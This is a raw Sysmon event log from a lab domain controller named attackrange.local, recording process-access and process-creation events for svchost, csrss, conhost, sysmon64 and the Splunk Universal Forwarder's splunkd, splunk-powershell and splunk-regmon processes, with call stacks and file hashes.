Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4421-6000-0E01-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4421-6000-0E01-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.745{08A6967A-4421-6000-0E01-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.525{08A6967A-4422-6000-0F01-000000009A01}41604180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4422-6000-0F01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4422-6000-0F01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.369{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4422-6000-0F01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:18.370{08A6967A-4422-6000-0F01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.182{08A6967A-4423-6000-1001-000000009A01}42965080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4423-6000-1001-000000009A01}4296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:19.025{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 